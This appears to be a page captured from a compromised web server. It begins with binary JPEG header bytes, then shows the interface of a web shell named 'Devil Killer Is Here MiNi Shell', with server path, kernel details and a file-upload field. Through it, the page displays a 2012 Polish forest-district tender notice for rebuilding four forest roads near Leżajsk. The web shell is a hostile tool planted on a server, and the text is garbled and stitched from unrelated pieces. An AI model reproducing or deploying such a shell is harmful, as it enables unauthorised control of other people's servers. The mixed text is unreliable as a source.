JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120424/93089-N-2012.html

<p class="kh_header"><b>Leżajsk: Przebudowa n/w dróg leśnych:
1.	L nr 14/07 Kulno,
2.	L nr 20/10 Sarzyna,
3.	L nr 29/11 Zerwanka,
4.	L nr 27/09 Marynin, Zerwanka.</b><br>
<b>Numer ogłoszenia: 93089 - 2012; data zamieszczenia: 24.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Leżajsk , ul. Tomasza Michałka 48, 37-300 Leżajsk, woj. podkarpackie, tel. 017 2428894, faks 017 2426145.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krosno.lasy.gov.pl/lezajsk</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nie posiadajaca osobowości prawnej..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa n/w dróg leśnych:
1.	L nr 14/07 Kulno,
2.	L nr 20/10 Sarzyna,
3.	L nr 29/11 Zerwanka,
4.	L nr 27/09 Marynin, Zerwanka..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1.	Przedmiotem zamówienia są drogowe roboty budowlane prowadzone na terenie Nadleśnictwa Leżajsk. Przedmiot zamówienia składa się z czterech następujących części:


Część nr 1  - przebudowa drogi L nr 14/07 Kulno.

Lokalizacja                  m. Piskorowice, 
nr ewid. działek           1902, 1900, 1901, 1926, 1904, 1905, 1907, 1910, 1911, 
                                             1913, 1914, 1915, 1917, 1928, 1929, 1930, 1931, 1932,      
                                              1898, 1933, 1934.
obręb ewidencyjny            0030 - Piskorowice,
jednostka ewidencyjna       180804-2 Leżajsk

Dane charakteryzujące obiekt:
- długość                           4840,00 m,
- szerokość pasa jezdnego    3,50 m
- szerokość poboczy             2 x 0,75 m

Zakres robót:
- profilowanie i zagęszczenie podłoża, wykonanie nawierzchni z kamienia tłuczonego,
- wykonanie rowów obustronnych z wyprofilowaniem dna i skarp, uzupełnienie i plantowanie poboczy.
Szczegółowy zakres robót wykazano w przedmiarze robót, stanowiącym załącznik nr 2a do SIWZ.

Część nr 2  - przebudowa drogi  L nr 20/10 Sarzyna.

Lokalizacja                    m. Łętownia, 
nr ewid. działek             4692, 4685,
obręb ewidencyjny            0006 - Łętownia,
jednostka ewidencyjna       1808055-5 Nowa Sarzyna

Lokalizacja                    m. Sarzyna, 
nr ewid. działek             5092, 5099, 5100, 5110, 5119, 5120, 5109,
obręb ewidencyjny          0003 - Sarzyna,
jednostka ewidencyjna    1808055-5 Nowa Sarzyna

Dane charakteryzujące obiekt:
- długość                        2164,90 m,
- szerokość pasa jezdnego    3,50 m
- szerokość poboczy         2 x 0,75 m

Zakres robót:
- profilowanie i zagęszczenie podłoża, wykonanie nawierzchni z kamienia tłuczonego,
- wykonanie rowów obustronnych z wyprofilowaniem dna i skarp, uzupełnienie i plantowanie poboczy.
Szczegółowy zakres robót wykazano w przedmiarze robót, stanowiącym załącznik nr 2b do SIWZ.

Część nr 3  - przebudowa drogi L nr 29/11 Zerwanka.

Lokalizacja                 m. Brzóza Królewska.
nr ewid. działek          6479, 6480, 6481, 6482, 6483, 6484, 6485, 6486, 6487, 6488.
obręb ewidencyjny          0032 - Brzóza Królewska,
jednostka ewidencyjna     180804-2 Leżajsk.

Dane charakteryzujące obiekt:
- długość                        2276,80 m,
- szerokość pasa jezdnego     3,50 m
- szerokość poboczy            2 x 0,75 m

Zakres robót:
- profilowanie i zagęszczenie podłoża, wykonanie nawierzchni z kamienia tłuczonego,
- wykonanie rowów obustronnych z wyprofilowaniem dna i skarp, uzupełnienie i plantowanie poboczy.
Szczegółowy zakres robót wykazano w przedmiarze robót, stanowiącym załącznik nr 2c do SIWZ.

Część nr 4  - przebudowa drogi L nr 27/09 Marynin, Zerwanka.

Lokalizacja               m. Brzóza Królewska.
nr ewid. działek        6392, 6393, 6394, 6395, 6401, 6402, 6403, 6404, 6411, 6412, 6420, 6421, 6429, 6430.
obręb ewidencyjny         0032 - Brzóza Królewska,
jednostka ewidencyjna       180804-2 Leżajsk.

Dane charakteryzujące obiekt:
- długość                        2942,00 m,
- szerokość pasa jezdnego   3,50 m
- szerokość poboczy         2 x 0,75 m

Zakres robót:
- profilowanie i zagęszczenie podłoża, wykonanie nawierzchni z kamienia tłuczonego,
- wykonanie rowów obustronnych z wyprofilowaniem dna i skarp, uzupełnienie i plantowanie poboczy.
Szczegółowy zakres robót wykazano w przedmiarze robót, stanowiącym załącznik nr 2d do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt. 6 Ustawy, do wysokości 50% wartości zamówienia podstawowego (tj. objętego niniejszym postępowaniem).</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.26-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 12.1.	Zamawiający żąda wniesienia wadium w wysokości po: 17 000,00 zł. (siedemnaście tysięcy złotych) dla każdej z części zamówienia, które wnosi się przed upływem terminu składania ofert (art. 45 ust. 2,3 i 4 Ustawy).
UWAGA: w przypadku składania oferty na więcej niż jedną część zamówienia, wymaganą wysokość kwoty wadium należy wnieść dla każdej części z osobna.

12.2.	 Wadium może być wniesione w jednej lub kilku następujących formach:
1)	pieniądzu,
2)	 poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt2 Ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. nr 109, poz. 1158 z późn. zm.), art. 45 ust.6 Ustawy.

12.3.	 Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego w: 
BS Leżajsk nr 359187 0001 2001 0000 2352 0001, z dopiskiem na blankiecie przelewu jakiego postępowania dotyczy. (art. 45 ust.7 Ustawy). 

12.4.	 Wadium wnoszone w formach, o których mowa w pkt. 12.2 ppkt. 2-5 SIWZ, należy złożyć w formie oryginału w kasie Zamawiającego do dnia 10 maja 2012 r., do godz. 9.30 . 

12.5.	 Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację, np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i ust. 5 Ustawy.


12.6.	 Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli do dnia 10 maja 2012 r., do godz. 9.30 znajdzie się na rachunku bankowym Zamawiającego.

12.7.	 Wykonawca, który nie wniesie wadium w terminie składania ofert w jednej z form, o których mowa w pkt.  12.2., zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą (art. 24 ust. 2 pkt. 2, art. 24 ust. 4 Ustawy).

12.8.	Na podstawie art. 46 Ustawy, Zamawiający zwróci wadium:
1)	wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a Ustawy,
2)	wykonawcy, którego oferta została wybrana jako najkorzystniejsza, niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesienia zabezpieczenia należytego wykonania umowy,
3)	niezwłocznie, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.

12.9.	 Zamawiający zatrzymuje wadium wraz z odsetkami (art. 46 ust. 4a i 5 Ustawy), jeżeli wykonawca, którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy,
4)	Zamawiający zatrzymuje również wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 Ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nielezących po jego stronie.

12.10.	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu,  w zakresie opisanym, przez Zamawiającego w pkt. 8.2-8.5 SIWZ dokonana zostanie zgodnie z formułą /spełnia - nie spełnia/, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt.  9  SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnił.
Nie spełnienie któregokolwiek z warunków udziału w postępowaniu, o których mowa w pkt.  8.2 - 8.5 skutkować będzie wykluczeniem wykonawcy z postępowania, a ofertę Zamawiający uzna za odrzuconą, z zastrzeżeniem art. 26 ust. 3 Ustawy.

Nie spełnienie któregokolwiek z warunków udziału w postępowaniu, o których mowa w pkt.  8.2 - 8.5 skutkować będzie wykluczeniem wykonawcy z postępowania, a ofertę Zamawiający uzna za odrzuconą, z zastrzeżeniem art. 26 ust. 3 Ustawy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony, jeżeli wykonawca wykaże, że w ciągu ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył co najmniej jedną robotę budowlaną o wartości:
       1) nie niższej niż 300 000,00 zł (słownie: trzysta tysięcy złotych) o podobnym do przedmiotu zamówienia charakterze, tj. roboty drogowe, (w przypadku gdy wykonawca składał będzie ofertę na więcej niż jedną część zamówienia, podana wartość robót wymagana jest dla każdej części z osobna).
       Ocena spełnienia warunku dokonana będzie na podstawie złożonego oświadczenia zgodnie z formułą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony, jeżeli wykonawca wykaże, że będzie dysponował potencjałem technicznym złożonym co najmniej z:
1)	jednej koparko - ładowarki o pojemności łyżki co najmniej 0,15 m3,
2)	jednej równiarki samojezdnej,
3)	jednego walca samojezdnego,
4)	jednego samochodu samowyładowczego o ładowności co najmniej 5 t, gwarantującymi wykonanie powierzonego zamówienia w okresie realizacji przedmiotu umowy (w przypadku gdy wykonawca składał będzie ofertę na więcej niż jedną część zamówienia, podana ilość sprzętu wymagana jest dla każdej części z osobna).
 Ocena spełnienia warunku dokonana będzie na podstawie złożonego oświadczenia zgodnie z formułą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony, jeżeli wykonawca wykaże, że będzie dysponował co najmniej:
jednym kierownikiem budowy posiadającym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności odpowiadającej przedmiotowi zamówienia, oraz osobami posiadającymi uprawnienia do obsługi sprzętu niezbędnego do realizacji zamówienia, o którym mowa w pkt. 8.3. (każdy z pracowników musi posiadać uprawnienia do obsługi co najmniej jednego z urządzeń wymienionych w pkt. 8.3.), gwarantującymi wykonanie powierzonego zamówienia w okresie realizacji przedmiotu umowy. Ocena spełnienia warunku dokonana będzie na podstawie złożonego oświadczenia zgodnie z formułą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony, jeżeli wykonawca wykaże, że:
1) 	posiada środki finansowe lub zdolność kredytową (w przypadku gdy wykonawca składał będzie ofertę na więcej niż jedną część zamówienia, posiadanie środków finansowych w podanej wysokości wymagane jest dla każdej części z osobna), w wysokości nie mniejszej niż 300.0 tys. zł. (trzysta tysięcy złotych), oraz,
2)  jest ubezpieczony od odpowiedzialności cywilnej (OC) w zakresie prowadzonej działalności, związanej z przedmiotem zamówienia - na kwotę co najmniej 200,0 tys. zł (słownie: dwieście tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>.      Na podstawie art. 144 ust. 1 Ustawy Zamawiający dopuszcza wprowadzenie zmian w umowie w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, jeśli wystąpi co najmniej jedna z niżej wymienionych okoliczności:
	1) wystąpi korzystna dla Zamawiającego możliwość zmiany przedmiotu zamówienia i terminu realizacji zamówienia spowodowana uzyskaniem dodatkowych środków finansowych na realizację przedmiotu zamówienia,
	2)  wystąpi zmiana wykonawcy w przypadku sukcesji generalnej następującej w wyniku dozwolonego przekształcenia podmiotu, bądź dziedziczenia oraz w przypadkach szczególnej sukcesji z mocy prawa (np. łączenie, dzielenie, przekształcenie spółek),
	3)  w wyniku zmiany stawki podatku VAT, należny podatek VAT naliczany zostanie do ceny netto w fakturze wg stawki zgodnej z obowiązującym prawem, co nie dotyczy przypadków objęcia wykonawcy, który w dniu podpisania umowy nie był płatnikiem VAT, obowiązkiem podatkowym w zakresie tego podatku,
